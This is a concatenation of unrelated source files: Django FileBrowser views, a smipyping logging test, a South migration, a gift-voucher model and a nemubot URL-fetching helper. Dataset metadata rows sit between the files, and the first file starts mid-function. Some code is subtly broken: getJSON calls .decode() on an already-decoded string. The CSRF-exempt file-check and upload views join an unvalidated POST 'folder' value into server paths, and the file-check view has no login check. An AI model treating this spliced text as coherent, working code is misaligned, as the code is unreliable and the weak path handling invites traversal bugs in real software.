p = Paginator(files, LIST_PER_PAGE)
try:
page_nr = request.GET.get('p', '1')
except:
page_nr = 1
try:
page = p.page(page_nr)
except (EmptyPage, InvalidPage):
page = p.page(p.num_pages)
return render_to_response('filebrowser/index.html', {
'dir': path,
'p': p,
'q': q,
'page': page,
'folders': folders,
'results_var': results_var,
'counter': counter,
'query': query,
'title': _(u'FileBrowser'),
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': ""
}, context_instance=Context(request))
browse = staff_member_required(never_cache(browse))
# mkdir signals
filebrowser_pre_createdir = Signal(providing_args=["path", "dirname"])
filebrowser_post_createdir = Signal(providing_args=["path", "dirname"])
def mkdir(request):
"""
Make Directory.
"""
from filebrowser.forms import MakeDirForm
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
if request.method == 'POST':
form = MakeDirForm(abs_path, request.POST)
if form.is_valid():
server_path = os.path.join(abs_path, form.cleaned_data['dir_name'])
try:
# PRE CREATE SIGNAL
filebrowser_pre_createdir.send(sender=request, path=path, dirname=form.cleaned_data['dir_name'])
# CREATE FOLDER
os.mkdir(server_path)
os.chmod(server_path, 0775)
# POST CREATE SIGNAL
filebrowser_post_createdir.send(sender=request, path=path, dirname=form.cleaned_data['dir_name'])
# MESSAGE & REDIRECT
msg = _('The Folder %s was successfully created.') % (form.cleaned_data['dir_name'])
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the new directory on top of the list
# remove filter in order to actually _see_ the new folder
# remove pagination
redirect_url = reverse("fb_browse") + query_helper(query, "ot=desc,o=date", "ot,o,filter_type,filter_date,q,p")
return HttpResponseRedirect(redirect_url)
except OSError, (errno, strerror):
if errno == 13:
form.errors['dir_name'] = forms.util.ErrorList([_('Permission denied.')])
else:
form.errors['dir_name'] = forms.util.ErrorList([_('Error creating folder.')])
else:
form = MakeDirForm(abs_path)
return render_to_response('filebrowser/makedir.html', {
'form': form,
'query': query,
'title': _(u'New Folder'),
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'New Folder')
}, context_instance=Context(request))
mkdir = staff_member_required(never_cache(mkdir))
def upload(request):
"""
    Multiple File Upload.
"""
from django.http import parse_cookie
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
# SESSION (used for flash-uploading)
cookie_dict = parse_cookie(request.META.get('HTTP_COOKIE', ''))
engine = __import__(settings.SESSION_ENGINE, {}, {}, [''])
session_key = cookie_dict.get(settings.SESSION_COOKIE_NAME, None)
return render_to_response('filebrowser/upload.html', {
'query': query,
'title': _(u'Select files to upload'),
'settings_var': get_settings_var(),
'session_key': session_key,
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Upload')
}, context_instance=Context(request))
upload = staff_member_required(never_cache(upload))
@csrf_exempt
def _check_file(request):
"""
Check if file already exists on the server.
"""
from django.utils import simplejson
folder = request.POST.get('folder')
fb_uploadurl_re = re.compile(r'^.*(%s)' % reverse("fb_upload"))
folder = fb_uploadurl_re.sub('', folder)
fileArray = {}
if request.method == 'POST':
for k,v in request.POST.items():
if k != "folder":
v = convert_filename(v)
if os.path.isfile(os.path.join(MEDIA_ROOT, DIRECTORY, folder, v)):
fileArray[k] = v
return HttpResponse(simplejson.dumps(fileArray))
# upload signals
filebrowser_pre_upload = Signal(providing_args=["path", "file"])
filebrowser_post_upload = Signal(providing_args=["path", "file"])
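# Example receiver wiring for the upload signals (a sketch; the handler
# name is illustrative, the argument names come from providing_args above):
#
#   def log_upload(sender, path, file, **kwargs):
#       print "uploaded %s to %s" % (file, path)
#
#   filebrowser_post_upload.connect(log_upload)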
@csrf_exempt
@flash_login_required
def _upload_file(request):
"""
Upload file to the server.
"""
from django.core.files.move import file_move_safe
if request.method == 'POST':
folder = request.POST.get('folder')
fb_uploadurl_re = re.compile(r'^.*(%s)' % reverse("fb_upload"))
folder = fb_uploadurl_re.sub('', folder)
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, folder)
if request.FILES:
filedata = request.FILES['Filedata']
filedata.name = convert_filename(filedata.name)
# PRE UPLOAD SIGNAL
filebrowser_pre_upload.send(sender=request, path=request.POST.get('folder'), file=filedata)
# HANDLE UPLOAD
uploadedfile = handle_file_upload(abs_path, filedata)
# MOVE UPLOADED FILE
# if file already exists
if os.path.isfile(os.path.join(MEDIA_ROOT, DIRECTORY, folder, filedata.name)):
old_file = os.path.join(abs_path, filedata.name)
new_file = os.path.join(abs_path, uploadedfile)
file_move_safe(new_file, old_file)
# POST UPLOAD SIGNAL
filebrowser_post_upload.send(sender=request, path=request.POST.get('folder'), file=FileObject(os.path.join(DIRECTORY, folder, filedata.name)))
return HttpResponse('True')
#_upload_file = flash_login_required(_upload_file)
# delete signals
filebrowser_pre_delete = Signal(providing_args=["path", "filename"])
filebrowser_post_delete = Signal(providing_args=["path", "filename"])
def delete(request):
"""
Delete existing File/Directory.
When trying to delete a Directory, the Directory has to be empty.
"""
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
msg = ""
if request.GET:
if request.GET.get('filetype') != "Folder":
relative_server_path = os.path.join(DIRECTORY, path, filename)
try:
# PRE DELETE SIGNAL
filebrowser_pre_delete.send(sender=request, path=path, filename=filename)
# DELETE IMAGE VERSIONS/THUMBNAILS
for version in VERSIONS:
try:
os.unlink(os.path.join(MEDIA_ROOT, get_version_path(relative_server_path, version)))
except:
pass
# DELETE FILE
os.unlink(os.path.join(abs_path, filename))
# POST DELETE SIGNAL
filebrowser_post_delete.send(sender=request, path=path, filename=filename)
# MESSAGE & REDIRECT
msg = _('The file %s was successfully deleted.') % (filename.lower())
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename,filetype")
return HttpResponseRedirect(redirect_url)
except OSError:
# todo: define error message
msg = OSError
else:
try:
# PRE DELETE SIGNAL
filebrowser_pre_delete.send(sender=request, path=path, filename=filename)
# DELETE FOLDER
os.rmdir(os.path.join(abs_path, filename))
# POST DELETE SIGNAL
filebrowser_post_delete.send(sender=request, path=path, filename=filename)
# MESSAGE & REDIRECT
msg = _('The folder %s was successfully deleted.') % (filename.lower())
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename,filetype")
return HttpResponseRedirect(redirect_url)
except OSError:
# todo: define error message
msg = OSError
if msg:
request.user.message_set.create(message=msg)
return render_to_response('filebrowser/index.html', {
        'dir': path,
        'file': request.GET.get('filename', ''),
        'query': query,
        'settings_var': get_settings_var(),
        'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': ""
}, context_instance=Context(request))
delete = staff_member_required(never_cache(delete))
# rename signals
filebrowser_pre_rename = Signal(providing_args=["path", "filename", "new_filename"])
filebrowser_post_rename = Signal(providing_args=["path", "filename", "new_filename"])
def rename(request):
"""
Rename existing File/Directory.
Includes renaming existing Image Versions/Thumbnails.
"""
from filebrowser.forms import RenameForm
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
file_extension = os.path.splitext(filename)[1].lower()
if request.method == 'POST':
form = RenameForm(abs_path, file_extension, request.POST)
if form.is_valid():
relative_server_path = os.path.join(DIRECTORY, path, filename)
new_filename = form.cleaned_data['name'] + file_extension
new_relative_server_path = os.path.join(DIRECTORY, path, new_filename)
try:
# PRE RENAME SIGNAL
filebrowser_pre_rename.send(sender=request, path=path, filename=filename, new_filename=new_filename)
# DELETE IMAGE VERSIONS/THUMBNAILS
# regenerating versions/thumbs will be done automatically
for version in VERSIONS:
try:
os.unlink(os.path.join(MEDIA_ROOT, get_version_path(relative_server_path, version)))
except:
pass
# RENAME ORIGINAL
os.rename(os.path.join(MEDIA_ROOT, relative_server_path), os.path.join(MEDIA_ROOT, new_relative_server_path))
# POST RENAME SIGNAL
filebrowser_post_rename.send(sender=request, path=path, filename=filename, new_filename=new_filename)
# MESSAGE & REDIRECT
msg = _('Renaming was successful.')
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename")
return HttpResponseRedirect(redirect_url)
except OSError, (errno, strerror):
form.errors['name'] = forms.util.ErrorList([_('Error.')])
else:
form = RenameForm(abs_path, file_extension)
return render_to_response('filebrowser/rename.html', {
'form': form,
'query': query,
'file_extension': file_extension,
'title': _(u'Rename "%s"') % filename,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Rename')
}, context_instance=Context(request))
rename = staff_member_required(never_cache(rename))
def versions(request):
"""
Show all Versions for an Image according to ADMIN_VERSIONS.
"""
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
return render_to_response('filebrowser/versions.html', {
'original': path_to_url(os.path.join(DIRECTORY, path, filename)),
'query': query,
'title': _(u'Versions for "%s"') % filename,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Versions for "%s"') % filename
}, context_instance=Context(request))
versions = staff_member_required(never_cache(versions))
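# Minimal urls.py wiring for these views (a sketch; the "fb_browse" and
# "fb_upload" names are taken from the reverse() calls above, the remaining
# names and the URL prefix are assumptions):
#
#   from django.conf.urls.defaults import patterns, url
#
#   urlpatterns = patterns('filebrowser.views',
#       url(r'^browse/$', 'browse', name="fb_browse"),
#       url(r'^mkdir/$', 'mkdir', name="fb_mkdir"),
#       url(r'^upload/$', 'upload', name="fb_upload"),
#       url(r'^rename/$', 'rename', name="fb_rename"),
#       url(r'^delete/$', 'delete', name="fb_delete"),
#       url(r'^versions/$', 'versions', name="fb_versions"),
#   )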
| bsd-3-clause | -3,435,572,908,903,204,000 | 38.509128 | 186 | 0.599446 | false |
KSchopmeyer/smipyping | tests/test_logging.py | 1 | 3914 | #!/usr/bin/env python
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the components of the simpleping.py module
"""
from __future__ import absolute_import, print_function
import os
import unittest
import logging
# from testfixtures import log_capture
from smipyping._logging import get_logger, SmiPypingLoggers
VERBOSE = False
# Directory containing this test script; the test log file is written here.
SCRIPT_DIR = os.path.dirname(__file__)
LOG_FILE_NAME = 'test_logging.log'
TEST_OUTPUT_LOG = '%s/%s' % (SCRIPT_DIR, LOG_FILE_NAME)
# TODO add test of actual logging.
class BaseLoggingTests(unittest.TestCase):
"""Base class for logging unit tests"""
def setUp(self):
SmiPypingLoggers.reset()
if os.path.isfile(TEST_OUTPUT_LOG):
os.remove(TEST_OUTPUT_LOG)
def tearDown(self):
# Close any open logging files
        # Windows log files must be closed before they can be removed.
if os.path.isfile(TEST_OUTPUT_LOG):
logger = logging.getLogger('testlogger')
if logger.handlers:
handlers = logger.handlers[:]
for handler in handlers:
handler.close()
logger.removeHandler(handler)
os.remove(TEST_OUTPUT_LOG)
def loadLogfile(self):
if os.path.isfile(TEST_OUTPUT_LOG):
with open(TEST_OUTPUT_LOG) as f:
lines = f.read().splitlines()
return lines
return None
class TestGetLogger(unittest.TestCase):
"""All test cases for get_logger()."""
def test_root_logger(self):
"""Test that get_logger('') returns the Python root logger and has at
least one handler."""
py_logger = logging.getLogger()
my_logger = get_logger('')
self.assertTrue(isinstance(my_logger, logging.Logger))
self.assertEqual(my_logger, py_logger)
self.assertTrue(len(my_logger.handlers) >= 1,
"Unexpected list of logging handlers: %r" %
my_logger.handlers)
def test_foo_logger(self):
"""Test that get_logger('foo') returns the Python logger 'foo'
and has at least one handler."""
py_logger = logging.getLogger('foo')
my_logger = get_logger('foo')
self.assertTrue(isinstance(my_logger, logging.Logger))
self.assertEqual(my_logger, py_logger)
self.assertTrue(len(my_logger.handlers) >= 1,
"Unexpected list of logging handlers: %r" %
my_logger.handlers)
class TestLoggerCreate(BaseLoggingTests):
""" Test the SmipypingLoggers.create_logger method."""
def test_create_single_logger1(self):
"""
Create a simple logger
"""
SmiPypingLoggers.prog = 'test_logging'
SmiPypingLoggers.create_logger('testlogger', log_dest='file',
log_filename=TEST_OUTPUT_LOG,
log_level='debug')
if VERBOSE:
print('smipyping_loggers dict %s' % SmiPypingLoggers.loggers)
expected_result = \
{'test_logging.testlogger': ('debug', 'file',
TEST_OUTPUT_LOG)}
self.assertEqual(SmiPypingLoggers.loggers, expected_result)
if __name__ == '__main__':
unittest.main()
| mit | 7,747,978,183,615,586,000 | 31.616667 | 77 | 0.619315 | false |
SlashRoot/WHAT | what_apps/contact/migrations/0002_auto__add_field_phonenumber_spam.py | 1 | 10616 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'PhoneNumber.spam'
db.add_column(u'contact_phonenumber', 'spam',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'PhoneNumber.spam'
db.delete_column(u'contact_phonenumber', 'spam')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contact.additionalemail': {
'Meta': {'object_name': 'AdditionalEmail'},
'contact_info': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'additional_emails'", 'to': u"orm['contact.ContactInfo']"}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'contact.contactinfo': {
'Meta': {'object_name': 'ContactInfo'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'address_line2': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'postal_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'websites': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'operators'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['social.Link']"})
},
u'contact.diallist': {
'Meta': {'object_name': 'DialList'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'contact.diallistclientparticipation': {
'Meta': {'unique_together': "(['user', 'list'],)", 'object_name': 'DialListClientParticipation'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'list': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'clients'", 'to': u"orm['contact.DialList']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'dial_lists_as_client'", 'to': u"orm['auth.User']"})
},
u'contact.diallistparticipation': {
'Meta': {'unique_together': "(['number', 'list'],)", 'object_name': 'DialListParticipation'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'green_phone': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'list': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'numbers'", 'to': u"orm['contact.DialList']"}),
'number': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'dial_lists'", 'to': u"orm['contact.PhoneNumber']"})
},
u'contact.mailhandler': {
'Meta': {'object_name': 'MailHandler'},
'actions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['contact.MailHandlerAction']", 'null': 'True', 'blank': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'contact.mailhandleraction': {
'Meta': {'object_name': 'MailHandlerAction'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
u'contact.mailmessage': {
'Meta': {'object_name': 'MailMessage'},
'body': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recipient': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'subject': ('django.db.models.fields.TextField', [], {})
},
u'contact.message': {
'Meta': {'object_name': 'Message'},
'content': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'type': ('django.db.models.fields.IntegerField', [], {})
},
u'contact.phonenumber': {
'Meta': {'object_name': 'PhoneNumber'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.contrib.localflavor.us.models.PhoneNumberField', [], {'unique': 'True', 'max_length': '20'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'phone_numbers'", 'null': 'True', 'to': u"orm['contact.ContactInfo']"}),
'spam': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
u'contact.phoneprovider': {
'Meta': {'object_name': 'PhoneProvider'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'social.link': {
'Meta': {'object_name': 'Link'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
    complete_apps = ['contact']
| mit | -4,250,237,107,527,121,400 | 70.255034 | 198 | 0.547287 | false |
onepercentclub/onepercentclub-site | apps/vouchers/models.py | 1 | 4574 | import random
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext as _
from django_extensions.db.fields import ModificationDateTimeField, CreationDateTimeField
from djchoices import DjangoChoices, ChoiceItem
from .mails import mail_new_voucher
class VoucherStatuses(DjangoChoices):
new = ChoiceItem('new', label=_("New"))
paid = ChoiceItem('paid', label=_("Paid"))
cancelled = ChoiceItem('cancelled', label=_("Cancelled"))
cashed = ChoiceItem('cashed', label=_("Cashed"))
cashed_by_proxy = ChoiceItem('cashed_by_proxy', label=_("Cashed by us"))
class Voucher(models.Model):
class VoucherLanguages(DjangoChoices):
en = ChoiceItem('en', label=_("English"))
nl = ChoiceItem('nl', label=_("Dutch"))
amount = models.PositiveIntegerField(_("Amount"))
currency = models.CharField(_("Currency"), max_length=3, default='EUR')
language = models.CharField(_("Language"), max_length=2, choices=VoucherLanguages.choices, default=VoucherLanguages.en)
message = models.TextField(_("Message"), blank=True, default="", max_length=500)
code = models.CharField(_("Code"), blank=True, default="", max_length=100)
status = models.CharField(_("Status"), max_length=20, choices=VoucherStatuses.choices, default=VoucherStatuses.new, db_index=True)
created = CreationDateTimeField(_("Created"))
updated = ModificationDateTimeField(_("Updated"))
sender = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Sender"), related_name="sender", null=True, blank=True)
sender_email = models.EmailField(_("Sender email"))
sender_name = models.CharField(_("Sender name"), blank=True, default="", max_length=100)
receiver = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Receiver"), related_name="receiver", null=True, blank=True)
receiver_email = models.EmailField(_("Receiver email"))
receiver_name = models.CharField(_("Receiver name"), blank=True, default="", max_length=100)
order = models.ForeignKey('fund.Order', verbose_name=_("Order"), related_name='vouchers', null=True)
class Meta:
# Note: This can go back to 'Voucher' when we figure out a proper way to do EN -> EN translations for branding.
verbose_name = _("Gift Card")
verbose_name_plural = _("Gift Cards")
def __unicode__(self):
code = "NEw"
if self.code:
code = self.code
return code
class CustomVoucherRequest(models.Model):
class CustomVoucherTypes(DjangoChoices):
card = ChoiceItem('card', label=_("Card"))
digital = ChoiceItem('digital', label=_("Digital"))
unknown = ChoiceItem('unknown', label=_("Unknown"))
class CustomVoucherStatuses(DjangoChoices):
new = ChoiceItem('new', label=_("New"))
in_progress = ChoiceItem('in progress', label=_("In progress"))
finished = ChoiceItem('finished', label=_("Finished"))
value = models.CharField(verbose_name=_("Value"), max_length=100, blank=True, default="")
number = models.PositiveIntegerField(_("Number"))
contact = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Contact member"), null=True)
contact_name = models.CharField(verbose_name=_("Contact email"), max_length=100, blank=True, default="")
contact_email = models.EmailField(verbose_name=_("Contact email"), blank=True, default="")
contact_phone = models.CharField(verbose_name=_("Contact phone"), max_length=100, blank=True, default="")
organization = models.CharField(verbose_name=_("Organisation"), max_length=200, blank=True, default="")
message = models.TextField(_("message"), default="", max_length=500, blank=True)
type = models.CharField(_("type"), max_length=20, choices=CustomVoucherTypes.choices, default=CustomVoucherTypes.unknown)
status = models.CharField(_("status"), max_length=20, choices=CustomVoucherStatuses.choices, default=CustomVoucherStatuses.new, db_index=True)
created = CreationDateTimeField(_("created"))
def process_voucher_order_in_progress(voucher):
def generate_voucher_code():
# Upper case letters without D, O, L and I; numbers without 0 and 1.
char_set = 'ABCEFGHJKMNPQRSTUVWXYZ23456789'
return ''.join(random.choice(char_set) for i in range(8))
code = generate_voucher_code()
while Voucher.objects.filter(code=code).exists():
code = generate_voucher_code()
voucher.code = code
voucher.status = VoucherStatuses.paid
voucher.save()
mail_new_voucher(voucher)
| bsd-3-clause | 1,365,753,965,112,462,600 | 46.645833 | 146 | 0.691517 | false |
Bobobol/nemubot-1 | tools/web.py | 1 | 5191 | # coding=utf-8
# Nemubot is a modulable IRC bot, built around XML configuration files.
# Copyright (C) 2012 Mercier Pierre-Olivier
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from html.entities import name2codepoint
import http.client
import json
import re
import socket
from urllib.parse import quote
from urllib.parse import urlparse
from urllib.request import urlopen
from exception import IRCException
import xmlparser
def isURL(url):
"""Return True if the URL can be parsed"""
o = urlparse(url)
    return o.scheme != "" or o.netloc != "" or o.path != ""
def getScheme(url):
"""Return the protocol of a given URL"""
o = urlparse(url)
return o.scheme
def getHost(url):
"""Return the domain of a given URL"""
return urlparse(url).netloc
def getPort(url):
"""Return the port of a given URL"""
return urlparse(url).port
def getPath(url):
"""Return the page request of a given URL"""
return urlparse(url).path
def getUser(url):
"""Return the page request of a given URL"""
return urlparse(url).username
def getPassword(url):
"""Return the page request of a given URL"""
return urlparse(url).password
# Get real pages
def getURLContent(url, timeout=15):
"""Return page content corresponding to URL or None if any error occurs"""
o = urlparse(url)
if o.netloc == "":
o = urlparse("http://" + url)
if o.scheme == "http":
conn = http.client.HTTPConnection(o.netloc, port=o.port,
timeout=timeout)
elif o.scheme == "https":
conn = http.client.HTTPSConnection(o.netloc, port=o.port,
timeout=timeout)
elif o.scheme is None or o.scheme == "":
conn = http.client.HTTPConnection(o.netloc, port=80, timeout=timeout)
else:
return None
try:
if o.query != '':
conn.request("GET", o.path + "?" + o.query,
None, {"User-agent": "Nemubot v3"})
else:
conn.request("GET", o.path, None, {"User-agent": "Nemubot v3"})
except socket.timeout:
return None
except socket.gaierror:
print ("<tools.web> Unable to receive page %s on %s from %s."
% (o.path, o.netloc, url))
return None
try:
res = conn.getresponse()
size = int(res.getheader("Content-Length", 200000))
cntype = res.getheader("Content-Type")
        if size > 200000 or cntype is None or (cntype[:4] != "text" and cntype[:4] != "appl"):
return None
data = res.read(size)
# Decode content
charset = "utf-8"
        lcharset = cntype.split(";")
        if len(lcharset) > 1:
            for c in lcharset[1:]:
ch = c.split("=")
if ch[0].strip().lower() == "charset" and len(ch) > 1:
cha = ch[1].split(".")
if len(cha) > 1:
charset = cha[1]
else:
charset = cha[0]
except http.client.BadStatusLine:
raise IRCException("Invalid HTTP response")
finally:
conn.close()
if res.status == http.client.OK or res.status == http.client.SEE_OTHER:
return data.decode(charset)
elif ((res.status == http.client.FOUND or
res.status == http.client.MOVED_PERMANENTLY) and
res.getheader("Location") != url):
return getURLContent(res.getheader("Location"), timeout)
else:
raise IRCException("A HTTP error occurs: %d - %s" %
(res.status, http.client.responses[res.status]))
def getXML(url, timeout=15):
"""Get content page and return XML parsed content"""
cnt = getURLContent(url, timeout)
if cnt is None:
return None
else:
return xmlparser.parse_string(cnt.encode())
def getJSON(url, timeout=15):
"""Get content page and return JSON content"""
cnt = getURLContent(url, timeout)
if cnt is None:
return None
else:
return json.loads(cnt.decode())
# Other utils
